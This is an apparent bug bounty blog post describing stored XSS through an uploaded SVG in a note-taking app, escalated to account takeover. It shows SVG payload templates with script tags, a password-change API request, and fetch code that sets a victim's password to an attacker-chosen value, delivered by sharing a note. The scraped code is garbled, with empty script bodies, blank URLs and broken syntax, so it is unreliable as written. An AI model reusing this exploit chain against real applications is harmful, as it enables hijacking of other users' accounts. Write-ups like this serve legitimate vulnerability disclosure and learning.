How I got Account Take Over in a Bug Bounty Program

Hiroki Sawada
2 min readOct 15, 2024


Hello everyone,

My ID is HirokiSawada, a bug bounty hunter from China.

This is my first bug bounty article and I want to share a account takeover (ATO) vulnerabilities through Cross-Site Scripting (XSS) that I discovered over the past half year. Let’s get started!


A few months ago, I was using a note-taking app to write some notes. Suddenly, I realized that you could upload
SVGs as background images for your notes. Hmph, it looks like I stumbled upon a vulnerability!

I uploaded this SVG with the following payload…

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">

I clicked on the SVG link and boom! A prompt appeared. Talk about getting lucky with vulns like that!

Then I thought like a hacker, ‘How can I exploit this?’ (As we all know, not exploiting an XSS is like wasting an XSS)

# Exploit

> I started experimenting with the features, and I found that accounts created directly with Google email didn’t have passwords. So I thought to myself, ‘Hmm, can I change the password?’

The POST request for changing the password looked like this...

POST /api/v3/setPassword HTTP/1.1
Accept: */*
Accept-Language: zh
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 63
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

  • I initially thought of using CSRF, but that didn’t seem to be the case since they were validating the Origin and Referer headers, yet not including a csrf token in the request. So I went ahead and wrote some code to…
const url = '';
const data = { newPassword: 'hacker.hirokisawada' };

fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
body: JSON.stringify(data),
.then((response) => response.json())
.then((result) => {
.catch((error) => {
console.error('Error:', error);

We can base64 encode this JavaScript code (I usually add it directly, but you can do it either way) and add it to a SVG.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">

Now we can upload this malicious SVG to the background, and by sharing our notes with others, we’ll be able to take control of their accounts !!!!



Hiroki Sawada
Hiroki Sawada

Responses (2)